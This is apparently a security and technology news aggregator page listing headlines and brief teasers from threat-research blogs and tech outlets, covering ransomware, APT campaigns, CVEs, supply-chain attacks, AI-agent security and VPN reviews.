Weaponized AI is fueling a new wave of cybercrime, said Group-IB in its latest report.
VoidLink: Evidence That the Era of Advanced AI-Generated Malware Has Begun
VoidLink's framework marks the first evidence of fully AI-designed and built advanced malware, beginning a new era of AI-generated malware.
MedDream PACS Premium sendOruReport reflected cross-site scripting (XSS) vulnerability
MY TAKE: From ‘holy mackeral’ to ‘daily routine’ — AI vendors maneuver to commandeer your life
An email from Claude landed in my inbox Friday morning with a subject line that stopped me cold: “Using Claude for your everyday life.” Related: AI’s fortune teller effect Not “Unlock the power of AI” or “Transform your productivity.” Just… … (more…) The post MY TAKE: From ‘holy mackeral’ to ‘dai...
Russian Hacktivists Intensify Disruptive Cyber Pressure on UK Orgs
UK NCSC warned of disruptive cyber attacks by Russian hacktivists targeting critical infrastructure.
Who’s on the Line? Exploiting RCE in Windows Telephony Service
Windows has supported computer telephony integration for decades, providing applications with the ability to manage phone devices, lines, and calls. While modern deployments increasingly rely on cloud-based telephony solutions, classic telephony services remain available out of the box in Windows...
Suspects Linked to Black Basta Ransomware Group Raided in Ukraine
Oleg Evgenievich Nefedov, allegedly one of the founders of Black Basta, was also placed on Europol’s and Interpol’s Most Wanted lists.
On the Coming Industrialisation of Exploit Generation with LLMs
Recently I ran an experiment where I built agents on top of Opus 4.5 and GPT-5.2 and then challenged them to write exploits for a zeroday vulnerability in the QuickJS Javascript interpreter. I adde…
YOLO Mode: Hidden Risks in Claude Code Permissions | UpGuard
Developers are frequently granting Claude Code permission to download, execute, and delete code, creating fertile ground for prompt injection attacks.
Account Compromise Surged 389% in 2025, Says eSentire
An eSentire report showed credential theft accounted for 74% of all observed cyber threats in 2025.
RondoDox Botnet Targets HPE OneView Vulnerability in Exploitation Wave
Check Point Research has reported a surge in attacks on a vulnerability in HPE OneView, driven by the Linux-based RondoDox botnet.
Windows Internals: Check Your Privilege - The Curious Case of ETW’s SecurityTrace Flag
Consuming from Microsoft-Windows-Threat-Intelligence without Antimalware-PPL or kernel patching/driver loading.
WEF: AI overtakes ransomware as fastest-growing cyber risk
We can no longer say that artificial intelligence is a "future risk", lurking somewhere on a speculative threat horizon. The truth is that it is a fast-growing cybersecurity risk that organizations are facing today. That's not just my opinion, that's also the message that comes loud and clear fro...
Hackers Increasingly Shun Encryption in Favour of Pure Data Theft and Extortion
While ‘traditional’ ransomware attacks remain stable, some gangs are shifting towards exploiting zero-days and supply chains to go straight to stealing data.
ICE Agent Doxxing Site DDoS-ed Via Russian Servers
DDoS-ers are striking a website linked to a data breach at the Department of Homeland Security.
Epic Games Store Installation DLL Hijacking Privilege Escalation Vulnerability
Community-powered security with AI: an open source framework for security research
Announcing GitHub Security Lab Taskflow Agent, an open source and collaborative framework for security research with AI.
Criminal Subscription Service Behind AI-Powered Cyber-Attacks Taken Out By Microsoft
RedVDS cyber-crime-as-a-service platform powering phishing, BEC attacks and other fraud has cost victims millions.
Hackers Use Fake PayPal Notices to Steal Credentials, Deploy RMMs
Phishing attacks have been identified using fake PayPal alerts to deploy remote monitoring and management (RMM) tools.
Sicarii Ransomware: Truth vs Myth
Key findings Introduction In December 2025, a previously unknown Ransomware-as-a-Service (RaaS) operation calling itself Sicarii began advertising its services across multiple underground platforms. The group’s name references the Sicarii, a 1st-century Jewish assassins group that opposed Roman r...
DeadLock Ransomware Uses Polygon Smart Contracts For Proxy Rotation
A new DeadLock ransomware operation uses Polygon blockchain smart contracts to manage proxy server addresses.
Patch Tuesday, January 2026 Edition
Microsoft today issued patches to plug at least 113 security holes in its various Windows operating systems and supported software. Eight of the vulnerabilities earned Microsoft's most-dire "critical" rating, and the company warns that attackers are already exploiting one of the bugs fixed today.
Wireless-(in)Fidelity: Pentesting Wi-Fi in 2025
The AI Fix #83: ChatGPT Health, Victorian LLMs, and the biggest AI bluffers
In episode 83 of The AI Fix, Graham reveals he's taken up lying to LLMs, and shows how a journalist exposed AI bluffers with a made-up idiom. Meanwhile Mark invents a "Godwin's Law" for AI, and explains how to ruin any LLM with humus. Also in this episode, a marriage is declared invalid thanks to...
CISA Flags Actively Exploited Gogs Vulnerability With No Patch
A high-severity security flaw in the Gogs Git service is being actively exploited, leading to remote code execution.
SHADOW#REACTOR Campaign Uses Text-Only Staging to Deploy Remcos RAT
SHADOW#REACTOR is a multi-stage Windows malware campaign that stealthily deploys the Remcos RAT using complex infection techniques.
Phishing Scams Exploit Browser-in-the-Browser Attacks to Steal Facebook Passwords
Cybersecurity researchers issue a warning over a surge in attacks designed to trick Facebook users into handing over login credentials.
Who Decides Who Doesn’t Deserve Privacy?
Remember the Ashley Madison data breach? That was now more than a decade ago, yet it arguably remains the single most noteworthy data breach of all time. There are many reasons for this accolade, but chief among them is that by virtue of the site being expressly designed to facilitate
Your personal information is on the dark web. What happens next?
If your data is on the dark web, it’s probably only a matter of time before it’s abused for fraud or account hijacking. Here’s what to do.
Hackers get hacked, as BreachForums database is leaked
Have you ever stolen data, traded a hacking tool, or just lurked on a dark web forum believing that you are anonymous? If so, I might have some unsettling news for you. Read more in my article on the Hot for Security blog.
Unveiling VoidLink – A Stealthy, Cloud-Native Linux Malware Framework
The new framework maintains long-term access to Linux systems while operating reliably in cloud and container environments.
World Economic Forum: Cyber-fraud overtakes ransomware as business leaders' top cyber-security concern
“Pervasive” threat of phishing, invoice scams and other cyber-enabled fraud is at “record highs”, warns WEF Cybersecurity Outlook 2026.
#Scraping Candidates
What’s next for DHS’s forthcoming replacement critical infrastructure protection panel, AI information sharing
▼
CISA Urges Critical Infrastructure Organizations to Take Action Against Insider Threats
▼
#Security Vendor Blog
PLEASE_READ_ME: The Opportunistic Ransomware Devastating MySQL Servers
▼
Guardicore Labs uncovers a Ransomware detection campaign targeting MySQL servers. Attackers use Double Extortion and publish data to pressure victims.
Read Full Article →
Threats Making WAVs - Incident Response to a Cryptomining Attack
▼
Guardicore security researchers describe and uncover a full analysis of a cryptomining attack, which hid a cryptominer inside WAV files. The report includes the full attack vectors, from detection, infection, network propagation and malware analysis and recommendations for optimizing incident res...
Read Full Article →
Analysis of active exploitation of SolarWinds Web Help Desk
▼
We are seeing exploitation of SolarWinds Web Help Desk via CVE‑2025‑40551 and CVE‑2025‑40536 that can lead to domain compromise; here is how to patch, hunt, and mitigate now. The post Analysis of active exploitation of SolarWinds Web Help Desk appeared first on Microsoft Security Blog .
Read Full Article →
Novel Technique to Detect Cloud Threat Actor Operations
▼
We introduce a novel method that maps cloud alert trends to MITRE ATT&CK techniques. The patterns created could identify threat actors by behavior. The post Novel Technique to Detect Cloud Threat Actor Operations appeared first on Unit 42 .
Read Full Article →
How to protect yourself from deepfake scammers and save your money | Kaspersky official blog
▼
Here’s how to spot deepfakes, protect yourself from identity theft, and avoid falling for neural network scams.
Read Full Article →
All gas, no brakes: Time to come to AI church
▼
This week, Joe cautions the rush to adopt AI tools rife with truly awful security vulnerabilities.
Read Full Article →
New Clickfix variant ‘CrashFix’ deploying Python Remote Access Trojan
▼
CrashFix crashes browsers to coerce users into executing commands that deploy a Python RAT, abusing finger.exe and portable Python to evade detection and persist on high‑value systems. The post New Clickfix variant ‘CrashFix’ deploying Python Remote Access Trojan appeared first on Microsoft Secur...
Read Full Article →
280+ Leaky Skills: How OpenClaw & ClawHub Are Exposing API Keys and PII
▼
Discover how 7.1% of AI agent skills are designed to leak secrets, PII, and API keys through LLM context. Learn to defend with Evo & mcp-scan.
Read Full Article →
The security implementation gap: Why Microsoft is supporting Operation Winter SHIELD
▼
Most security incidents happen in the gap between knowing what matters and actually implementing security controls consistently. Read how Microsoft is helping organizations close this implementation gap. The post The security implementation gap: Why Microsoft is supporting Operation Winter SHIELD...
Read Full Article →
SIEM Rules for detecting exploitation of vulnerabilities in FortiCloud SSO
▼
A set of SIEM rules for detecting attempts to bypass authentication in Fortinet products using the FortiCloud SSO mechanism has been added to the Kaspersky Unified Monitoring and Analysis Platform.
Read Full Article →
Chrysalis, Notepad++, and Supply Chain Risk: What it Means, and What to Do Next
▼
When Rapid7 published its analysis of the Chrysalis backdoor linked to a compromise of Notepad++ update infrastructure, it raised understandable questions from customers and security teams. The investigation showed that attackers did not exploit a flaw in the application itself. Instead, they com...
Read Full Article →
2025 SLG cyber trends: 5 lessons to build a 2026 cyber roadmap
▼
From school districts to state agencies, 2025 cyber incidents were a wake-up call about asset visibility. Discover five actionable lessons SLG leaders can use to close the cyber exposure gap and move from reactive threat detection and response to proactive exposure management. Key takeaways Effec...
Read Full Article →
Knife Cutting the Edge: Disclosing a China-nexus gateway-monitoring AitM framework
Cisco Talos uncovered “DKnife,” a fully featured gateway-monitoring and adversary-in-the-middle (AitM) framework comprising seven Linux-based implants.
Read Full Article →
The Shadow Campaigns: Uncovering Global Espionage
In 2025 a threat group compromised government and critical infrastructure in 37 countries, with reconnaissance in 155. The post The Shadow Campaigns: Uncovering Global Espionage appeared first on Unit 42 .
Read Full Article →
Stan Ghouls targeting Russia and Uzbekistan with NetSupport RAT
We analyze the recent Stan Ghouls campaign targeting organizations in Russia and Uzbekistan: Java-based loaders, the NetSupport RAT, and a potential interest in IoT.
Read Full Article →
Snyk Finds Prompt Injection in 36%, 1467 Malicious Payloads in a ToxicSkills Study of Agent Skills Supply Chain Compromise
Snyk’s ToxicSkills research reveals 36% of AI agent skills contain security flaws, including 1,467 vulnerable skills and active malicious payloads targeting OpenClaw, Claude Code, and Cursor users.
Read Full Article →
Detecting backdoored language models at scale
We're releasing new research on detecting backdoors in open-weight language models and highlighting a practical scanner designed to detect backdoored models at scale and improve overall trust in AI systems. The post Detecting backdoored language models at scale appeared first on Microsoft Securit...
Read Full Article →
LookOut: Discovering RCE and Internal Access on Looker (Google Cloud & On-Prem)
Tenable Research discovered two novel vulnerabilities in Google Looker that could allow an attacker to completely compromise a Looker instance. Google moved swiftly to patch these issues. Organizations running Looker on-prem should verify they have upgraded to the patched versions. Key takeaways ...
Read Full Article →
Why Smart People Fall For Phishing Attacks
Why do successful phishing attacks target our psychology rather than just our software? Discover Unit 42’s latest insights on defeating social engineering and securing your digital life. The post Why Smart People Fall For Phishing Attacks appeared first on Unit 42 .
Read Full Article →
Malicious use of virtual machine infrastructure
Bulletproof hosting providers are abusing the legitimate ISPsystem infrastructure to supply virtual machines to cybercriminals. Categories: Threat Research. Tags: virtual machine, cybercrime, Ransomware, ISPs
Read Full Article →
From Clawdbot to Moltbot to OpenClaw: Security Experts Detail Critical Vulnerabilities and 6 Immediate Hardening Steps for the Viral AI Agent
Moltbot, the viral AI agent, offers immense power but is riddled with critical vulnerabilities, including remote code execution (RCE), exposed control interfaces, and malicious extensions. Read on to understand the vulnerabilities associated with Moltbot and the immediate security practices users...
Read Full Article →
Microsoft SDL: Evolving security practices for an AI-powered world
Discover Microsoft’s holistic SDL for AI combining policy, research, and enablement to help leaders secure AI systems against evolving cyberthreats. The post Microsoft SDL: Evolving security practices for an AI-powered world appeared first on Microsoft Security Blog .
Read Full Article →
Frequently Asked Questions About Notepad++ Supply Chain Compromise
Threat actors compromised the update infrastructure for Notepad++, redirecting traffic to an attacker controlled site for targeted espionage purposes. Change log Update February 4: This FAQ blog has been updated to note that CVE-2025-15556 was assigned for this security incident. Click here to re...
Read Full Article →
The Notepad++ supply chain attack — unnoticed execution chains and new IoCs
Kaspersky GReAT experts discovered previously undocumented infection chains used in the Notepad++ supply chain attacks. The article provides new IoCs related to those incidents which employ DLL sideloading and Cobalt Strike Beacon delivery.
Read Full Article →
Introducing the AI Security Fabric: Empowering Software Builders in the Era of AI
Snyk introduces the AI Security Fabric and a prescriptive path to help organizations secure software at the speed of AI. Discover how to operationalize AI security and scale innovation without compromising on safety.
Read Full Article →
The Prescriptive Path to Operationalizing AI Security
Learn how to move from vision to practice with the Prescriptive Path, a framework for operationalizing AI security at scale. By replacing fragmented tools with a unified platform, you can build trust and secure AI-native applications at machine speed.
Read Full Article →
Infostealers without borders: macOS, Python stealers, and platform abuse
How modern infostealers target macOS systems, leverage Python‑based stealers, and abuse trusted platforms and utilities to distribute credential‑stealing payloads. The post Infostealers without borders: macOS, Python stealers, and platform abuse appeared first on Microsoft Security Blog .
Read Full Article →
How does cyberthreat attribution help in practice?
Why it would be useful to identify the specific hacking group behind a malware file found in your infrastructure.
Read Full Article →
The Chrysalis Backdoor: A Deep Dive into Lotus Blossom’s toolkit
Rapid7 Labs, together with the Rapid7 MDR team, has uncovered a sophisticated campaign attributed to the Chinese APT group Lotus Blossom. Active since 2009, the group is known for its targeted espionage campaigns primarily impacting organizations across Southeast Asia and more recently Central Am...
Read Full Article →
What’s New in Tenable Cloud Security: Multi-cloud Risk Analysis, Attack Surface Assessments, Improved IAM Security and More
Tenable Cloud Security continues to expand the technical depth of our Tenable One exposure management platform. Our latest enhancements include unified multi-cloud exploration, high-fidelity network validation, and expanded entitlement visibility across infrastructure and identity providers. Key ...
Read Full Article →
Kaspersky SIEM 4.2 update — what’s new? | Kaspersky official blog
Kaspersky Unified Monitoring and Analysis Platform, version 4.2: detecting compromised accounts using AI, updated correlator, and other innovations.
Read Full Article →
Privileged File System Vulnerability Present in a SCADA System
We detail our discovery of CVE-2025-0921. This privileged file system flaw in SCADA system Iconics Suite could lead to a denial-of-service (DoS) attack. The post Privileged File System Vulnerability Present in a SCADA System appeared first on Unit 42 .
Read Full Article →
Case study: Securing AI application supply chains
Securing AI-powered applications requires more than just safeguarding prompts. Organizations must adopt a holistic approach that includes monitoring the AI supply chain, assessing frameworks, SDKs, and orchestration layers for vulnerabilities, and enforcing strong runtime controls for agents and ...
Read Full Article →
CVE-2026-1281, CVE-2026-1340: Ivanti Endpoint Manager Mobile (EPMM) Zero-Day Vulnerabilities Exploited
Two Critical vulnerabilities in Ivanti’s popular mobile device management solution have been exploited in the wild in limited attacks Key takeaways: Patch Ivanti EPMM immediately. Both CVE-2026-1281 and CVE-2026-1340 have been exploited in the wild, though impact has been limited so far. Apply th...
Read Full Article →
Turning threat reports into detection insights with AI
Security teams often spend days manually turning long incident reports and threat writeups into actionable detections by extracting TTPs. This blog post shows an AI-assisted workflow that does the same job in minutes. It extracts the TTPs, maps them to existing detection coverage, and flags poten...
Read Full Article →
I'm locked in!
Hazel reflects on how to find balance while staying informed, then delivers practical updates and insights on the latest cybersecurity threats.
Read Full Article →
New Microsoft Data Security Index report explores secure AI adoption to protect sensitive data
The 2026 Microsoft Data Security Index explores one of the most pressing questions facing organizations today: How can we harness the power of generative AI while safeguarding sensitive data? The post New Microsoft Data Security Index report explores secure AI adoption to protect sensitive data appe...
Read Full Article →
Supply chain attack on eScan antivirus: detecting and remediating malicious updates
On January 20, Kaspersky solutions detected malware used in eScan antivirus supply chain attack. In this article we provide available information on the threat: indicators of compromise, threat hunting and mitigating tips, etc.
Read Full Article →
What AI toys can actually discuss with your child | Kaspersky official blog
AI toys have been found discussing knives, drugs, sex, and mature games with children. We dive into the latest research results and the risks to security and privacy.
Read Full Article →
Microsoft releases update to address zero-day vulnerability in Microsoft Office
Microsoft has published three out-of-band (OOB) updates so far in January 2026. One of these updates was released to address a vulnerability, CVE-2026-21509, affecting Microsoft Office that has been reportedly exploited in the wild.
Read Full Article →
Dissecting UAT-8099: New persistence mechanisms and regional focus
Cisco Talos has identified a new, regionally targeted campaign by UAT-8099 that leverages advanced persistence techniques and custom BadIIS malware variants to compromise IIS servers, particularly in Thailand and Vietnam.
Read Full Article →
IR Trends Q4 2025: Exploitation remains dominant, phishing campaign targets Native American tribal organizations
A drop in exploitation and ransomware, but a spike in phishing and credential abuse, show why timely patching and robust MFA matter more than ever.
Read Full Article →
Eeny, meeny, miny, moe? How ransomware operators choose victims
Most ransomware attacks are opportunistic, not targeted at a specific sector or region. Categories: Threat Research. Tags: Ransomware, cybercrime, state-sponsored ransomware, victimization
Read Full Article →
Microsoft announces the 2026 Security Excellence Awards winners
Congratulations to the winners of the 2026 Microsoft Security Excellence Awards that recognize the innovative defenders who have gone above and beyond. The post Microsoft announces the 2026 Security Excellence Awards winners appeared first on Microsoft Security Blog .
Read Full Article →
Fake apps, NFC skimming attacks, and other Android issues in 2026 | Kaspersky official blog
How to safely use Android devices in the face of 2026’s new security threats
Read Full Article →
Introducing Tenable One AI Exposure: A New Standard for Securing AI Usage at Scale
Continuously discover and monitor all AI usage across your organization, including shadow AI, agents, browser plug-ins, and more, with Tenable One AI Exposure. Map complex AI workflows to reveal high-impact exposures and monitor compliance with security and AI acceptable use policies. Key takeawa...
Read Full Article →
HoneyMyte updates CoolClient and deploys multiple stealers in recent campaigns
Kaspersky researchers analyze updated CoolClient backdoor and new tools and scripts used in HoneyMyte (aka Mustang Panda or Bronze President) APT campaigns, including three variants of a browser data stealer.
Read Full Article →
Microsoft Office vulnerability (CVE-2026-21509) in active exploitation
Categories: Threat Research. Tags: Microsoft Office, vulnerability, advisory
Read Full Article →
Agentic AI security measures based on the OWASP ASI Top 10
Key security controls to implement in your organization to protect against malicious AI agent behavior.
Read Full Article →
CVE-2026-23864: React and Next.js Denial of Service via Memory Exhaustion
Generative AI and cybersecurity: What Sophos experts expect in 2026
Categories: Sophos Insights. Tags: Sophos AI, Gen AI, Year in Review
Read Full Article →
AI jailbreaking via poetry: bypassing chatbot defenses with rhyme | Kaspersky official blog
A new study shows that verse-based prompts can slash the effectiveness of AI safety constraints. We’re breaking down an experiment involving 25 language models and its key takeaways.
Read Full Article →
I scan, you scan, we all scan for... knowledge?
In this week's newsletter, Bill hammers home the old adage, "Know your environment" — even throughout alert fatigue.
Read Full Article →
Huntress Catches SmarterMail Account Takeover Leading to RCE
SmarterMail versions prior to Build 9511 are vulnerable to privileged account takeover and remote code execution. Learn more about the latest Huntress DE&TH Team’s findings.
Read Full Article →
Foxit, Epic Games Store, MedDreams vulnerabilities
Cisco Talos’ Vulnerability Discovery & Research team recently disclosed three vulnerabilities in Foxit PDF Editor, one in the Epic Games Store, and twenty-one in MedDream PACS.
Read Full Article →
The Next Frontier of Runtime Assembly Attacks: Leveraging LLMs to Generate Phishing JavaScript in Real Time
We discuss a novel AI-augmented attack method where malicious webpages use LLM services to generate dynamic code in real-time within a browser. The post The Next Frontier of Runtime Assembly Attacks: Leveraging LLMs to Generate Phishing JavaScript in Real Time appeared first on Unit 42 .
Read Full Article →
How to protect yourself from Bluetooth-headset tracking and the WhisperPair attack | Kaspersky official blog
With the WhisperPair attack, a stranger can pair their device with your headphones to keep tabs on your location.
Read Full Article →
Oracle January 2026 Critical Patch Update Addresses 158 CVEs
Oracle addresses 158 CVEs in its first quarterly update of 2026 with 337 patches, including 27 critical updates. Key takeaways: The first Critical Patch Update (CPU) for 2026 contains fixes for 158 unique CVEs in 337 security updates. 27 issues (8% of all patches) were assigned a critical severi...
Read Full Article →
Tenable Discovers SSRF Vulnerability in Java TLS Handshakes That Creates DoS Risk
Tenable Research has discovered a server-side request forgery (SSRF) vulnerability in Java’s handling of client certificates during a TLS handshake. In certain configurations, this can be abused to cause a denial-of-service (DoS) condition. Key takeaways Tenable Research identified a vulnerabilit...
Read Full Article →
DNS OverDoS: Are Private Endpoints Too Private?
We've identified an aspect of Azure’s Private Endpoint architecture that could expose Azure resources to denial of service (DoS) attacks. The post DNS OverDoS: Are Private Endpoints Too Private? appeared first on Unit 42 .
Read Full Article →
What is the “year 2038 problem”, and how can businesses fix it?
How can organizations find and fix systems vulnerable to Y2K38 — the Unix epoch time overflow problem, also known as Epochalypse?
Read Full Article →
Predicting 2026
In this week’s newsletter, Martin examines the evolving landscape for 2026, highlighting key threats, emerging trends like AI-driven risks, and the continued importance of addressing familiar vulnerabilities.
Read Full Article →
UAT-8837 targets critical infrastructure sectors in North America
Cisco Talos is closely tracking UAT-8837, a threat actor we assess with medium confidence is a China-nexus advanced persistent threat (APT) actor.
Read Full Article →
CVE-2025-64155: Exploit Code Released for Critical Fortinet FortiSIEM Command Injection Vulnerability
Exploit code has been published for CVE-2025-64155, a critical command injection vulnerability affecting Fortinet FortiSIEM devices. Key takeaways: CVE-2025-64155 is a critical operating system (OS) command injection vulnerability affecting Fortinet FortiSIEM. Fortinet vulnerabilities have histor...
Read Full Article →
Brushstrokes and breaches with Terryn Valikodath
Terryn’s path to cybersecurity started with a fascination for criminal forensics and a knack for jailbreaking his family's tech — interests that eventually steered him toward the fast-paced world of digital investigations.
Read Full Article →
Threat Brief: MongoDB Vulnerability (CVE-2025-14847)
Database platform MongoDB disclosed CVE-2025-14847, called MongoBleed. This is an unauthenticated memory disclosure vulnerability with a CVSS score of 8.7. The post Threat Brief: MongoDB Vulnerability (CVE-2025-14847) appeared first on Unit 42 .
Read Full Article →
Microsoft Patch Tuesday for January 2026 — Snort rules and prominent vulnerabilities
Microsoft has released its monthly security update for January 2026, which includes 112 vulnerabilities affecting a range of products, including 8 that Microsoft marked as “critical”.
Read Full Article →
Remote Code Execution With Modern AI/ML Formats and Libraries
We identified remote code execution vulnerabilities in open-source AI/ML libraries published by Apple, Salesforce and NVIDIA. The post Remote Code Execution With Modern AI/ML Formats and Libraries appeared first on Unit 42 .
Read Full Article →
Your personal information is on the dark web. What happens next?
If your data is on the dark web, it’s probably only a matter of time before it’s abused for fraud or account hijacking. Here’s what to do.
Read Full Article →
#Tech
‘Black Mirror’ Episode Comes to Life in Alleged $66 Million Crypto Theft Attempt
Authorities believe the would-be alleged thieves were being extorted by mysterious figures named “Red” and “8” who communicated with them over Signal.
Read Full Article →
Habit Detection For Home Assistant
Computers are very good at doing exactly what they’re told. They’re still not very good at coming up with helpful suggestions of their own. They’re very much more about following …
Read Full Article →
Upgrading The E-mu Audity 20 Years After Factory Support Ended
If you purchased an E-mu Audity 2000 ROMpler back in 1998, you almost certainly got a rig with the 1.00 firmware. It was fine, if a little limited, particularly where …
Read Full Article →
Whether they are building agents or folding proteins, LLMs need a friend
AI pioneer Vishal Sikka warns to never trust an LLM that runs alone interview Don't trust; verify. According to AI researcher Vishal Sikka, LLMs alone are limited by computational boundaries and will start to hallucinate when they push those boundaries. One solution? Companion bots that check the...
Read Full Article →
The best free VPNs: 5 no-cost top picks
VPNs, or virtual private networks, are one of the most effective ways to stay safe online. Not only do they allow you to stay anonymous, but they can help safeguard your data and keep intrusive trackers at bay. Plus, they allow you to get around region blocks on streaming services and avoid ISP t...
Read Full Article →
Moltbook’s rebellion of AI agents shows real risks
Is an autonomous network of AI agents about to break free from humanity and take over the world? You might think so when you follow the uproar surrounding Moltbook , the latest big buzzword from the tech world. A quick background for those who haven’t been keeping up: The other week Clawbot — a p...
Read Full Article →
If you’re a Substack user, your data might’ve been leaked
Substack has informed some of its users of a data breach in which email addresses and phone numbers were stolen. The attack occurred in October 2025, but the breach was first discovered on February 3rd, 2026, reports BleepingComputer . According to Substack CEO Chris Best, an unauthorized party g...
Read Full Article →
Flickr emails users about data breach, pins it on 3rd party
Attackers may have snapped user locations and activity information, message warns. Legacy image-sharing website Flickr suffered a data breach, according to customer emails seen by The Register.…
Read Full Article →
DDoS deluge: Brit biz battered as botnet blitzes break records
UK leaps to sixth in global flood charts as mega-swarm unleashes 31.4 Tbps Yuletide pummeling. Cloudflare says DDoS crews ended 2025 by pushing traffic floods to new extremes, while Britain made an unwelcome leap of 36 places to become the world's sixth-most targeted location.…
Read Full Article →
Pretend Disk Format: PDFs harbor new dangers
A particularly insidious phishing campaign is disguising malware pretending to be ordinary PDF documents behind links to virtual hard disks. Because workers are used to receiving purchase orders or invoices in the PDF format, they are likely to open the malicious files unthinkingly, enabling the ...
Read Full Article →
Avoid Windows 11 if you care about your data, privacy experts warn
Many Windows 10 users are still struggling to take that leap of faith and switch over to Windows 11. The move has long seemed to be one that’s inevitable even if postponed for as long as possible, but data protection experts are now advising that it’s the smart move: don’t switch to Windows 11 an...
Read Full Article →
The rise of GenAI in decision intelligence: Trends and tools for 2026 and beyond
As someone who has spent 17+ years working hands-on with data analytics and decision intelligence initiatives across multiple industries, I have observed generative AI mature from an intriguing side experiment into a genuinely transformative capability. What began in late 2024 as cautious pilots ...
Read Full Article →
How to build AI employees that act more like employees and less like AI
“I want you to build an AI project manager.” It seemed like a simple request at the time; a fun little side project for one of our engineers to knock out in a couple of days between their “real work.” That turned out to be partly right. It was a fun project, but it wasn’t quick. It forced us to r...
Read Full Article →
Hey, senior PMs: Shipping faster won’t get you promoted
It was 2022 and I was sitting in a quarterly business review feeling invincible. I was the director of product for a SaaS platform scaling toward $25 million in annual recurring revenue (ARR). My team was a machine. Our Jira hygiene was impeccable. Our velocity was at an all-time high. We were sh...
Read Full Article →
From go-live to always-live: How agentic AI is rewriting the finance transformation playbook
I still remember the feeling of day 1 on a massive post-merger integration project. The command center was packed, coffee cups were overflowing and the air was thick with the silent prayer of every CIO: Please let the data reconcile. We had spent months on the blueprint phase. We had retired 25 l...
Read Full Article →
The 10-man parity rule: When AI adoption accelerates faster than organizations can see
Five years ago, digital transformation inside large enterprises followed a familiar pattern. Technology initiatives were introduced centrally, often by IT or digital teams, and pushed into operating environments measured on uptime, cost and output. Digital was viewed as organizational infrastruct...
Read Full Article →
OpenClaw: The AI agent that’s got humans taking orders from bots
Well, that escalated quickly. I’m talking, of course, about OpenClaw (a.k.a. Moltbot a.k.a. Clawdbot), which not only represents a headlong rush into unchecked agentic AI, but also an emerging ecosystem that reads like every dystopian cautionary cyberpunk novel ever written. As my colleague and f...
Read Full Article →
Asia-based government spies quietly broke into critical networks across 37 countries
And their toolkit includes a new Linux kernel rootkit. A state-aligned cyber group in Asia compromised government and critical infrastructure organizations across 37 countries in an ongoing espionage campaign, according to security researchers.…
Read Full Article →
Microsoft bakes one of its best security tools right into Windows 11
Microsoft is apparently integrating System Monitor (Sysmon) directly into Windows 11. This pro-level tool allows you to detect suspicious processes caused by malware or hackers on a Windows PC. Part of the popular Sysinternals suite, it’s free to download directly from Microsoft . Developed by so...
Read Full Article →
Enterprise tech spending to cross $6 trillion in 2026, driven by AI infrastructure boom
Global IT spending will grow 10.8% to reach $6.15 trillion in 2026, Gartner said in its latest forecast, with AI infrastructure accounting for the lion’s share of that growth. The forecast shows a spending spree that shows no signs of slowing down, despite growing chatter about an AI bubble. Ente...
Read Full Article →
Three clues that your LLM may be poisoned with a sleeper-agent back door
It's a threat straight out of sci-fi, and fiendishly hard to detect. Sleeper agent-style backdoors in AI large language models pose a straight-out-of-sci-fi security threat.…
Read Full Article →
Windows 11 Insider Previews: What’s in the latest build?
Windows 11 25H2 has been released, but behind the scenes, Microsoft is constantly working to improve the newest version of Windows. The company frequently rolls out public preview builds to members of its Windows Insider Program, allowing them to test out — and help shape — upcoming features. Ski...
Read Full Article →
Fastest VPN 2026: Expert picks of the top 5 VPN speed demons
When looking for a top-notch VPN, the two most important things to watch out for are privacy and speed. While privacy is crucial to a good VPN, speed shouldn’t be overlooked. Faster speeds mean quicker file downloads and website load times, higher-quality streaming, and just a better all-around e...
Read Full Article →
Model Context Protocol: Apple’s Xcode 26.3 opens for vibe coding
Apple has embraced agentic AI for developers, introducing direct support in Xcode 26.3 for both Anthropic’s Claude Agent and OpenAI’s Codex and making vibe coding now a platform feature for iPhone, iPad, and Mac. It’s available to all Apple Developer Program members now and will be released “soon...
Read Full Article →
Testing can’t keep up with rapidly advancing AI systems: AI Safety Report
AI systems continued to advance rapidly over the past year, but the methods used to test and manage their risks did not keep pace, according to the International AI Safety Report 2026. The report , produced with inputs from more than 100 experts across over 30 countries, said that pre-deployment ...
Read Full Article →
Uh oh! 1+ million Android apps exposed 700 TB of sensitive user data
Towards the end of January, security researchers at Cybernews published a study on AI apps in the Google Play Store. The study revealed that numerous AI apps had inadequate security, leading them to inadvertently leak data from Google’s cloud servers. The result? A whopping total of 730 million T...
Read Full Article →
High-risk Office security flaw: Microsoft issues emergency updates
Updated on February 3rd, 2026: New details have come to light regarding how attackers exploit this vulnerability. We’ve added a section explaining it down below. Microsoft recently published a security advisory warning of a newly discovered zero-day vulnerability in Office applications. The vulne...
Read Full Article →
Linux's Second-in-Command Greg Kroah-Hartman Bestowed With The European Open Source Award
Linux kernel maintainer honored at Brussels ceremony for decades of critical infrastructure work.
Read Full Article →
Best VPNs for Android: 5 top picks for phones and tablets
Many people’s daily browsing is now done on their mobile devices. So it’s more important than ever to have a great VPN that works well on your phone. While some services work best on Windows, others particularly shine when used on Android devices, and I’ve curated a list of my favorites to help y...
Read Full Article →
9 million Android devices were secretly hijacked by proxy network
Google recently announced in a statement that it has disrupted the “world’s largest residential proxy network.” It was able to remain undetected for a long time, hijacking innocent users’ private devices (including smartphones, PCs, and smart home devices) and using them as gateways for distribut...
Read Full Article →
Best VPN services: 8 top picks for every VPN need
A VPN, or virtual private network, is one of the best tools you can use to boost your online privacy and security. But in the vast ocean of available services, it can be exhausting trying to find the best VPN for your needs. Thankfully, we here at PCWorld are VPN experts and we’re sharing decades...
Read Full Article →
Update now! Bluetooth flaw lets attackers silently hijack accessories
Security experts at the Computer Security and Industrial Cryptography research group (COSIC) are warning of a serious Bluetooth security vulnerability that could affect millions of headphones, speakers, and other wireless accessories worldwide. If you have any Bluetooth devices, you should check ...
Read Full Article →
Beware! That Microsoft email is genuine, but it’s also a scam
Microsoft users are reporting a particularly difficult-to-detect scam: phishing emails sent from a genuine Microsoft email address that’s classified as “trustworthy” by the company itself. The emails appear to be official, but they’re demanding high-value payments and leading victims straight int...
Read Full Article →
Ditch your PC’s free trial—these 3 antivirus options are way better
Using the antivirus trial that came with your PC? Or perhaps you’ve just been sitting it out with Windows Security? You may be able to do better. Why only may do better? It all depends on your needs—factors like your household, level of tech savvy, and willingness to directly manage your protecti...
Read Full Article →
WinRAR under attack by state-level hackers, according to Google
WinRAR, a tool for unpacking compressed files , is one of those pillars of everyday PC use that’s kind of faded into the background. I used to install it on every computer setup, like VLC and Irfanview. But according to a report from security researchers at Google, a long-known vulnerability in W...
Read Full Article →
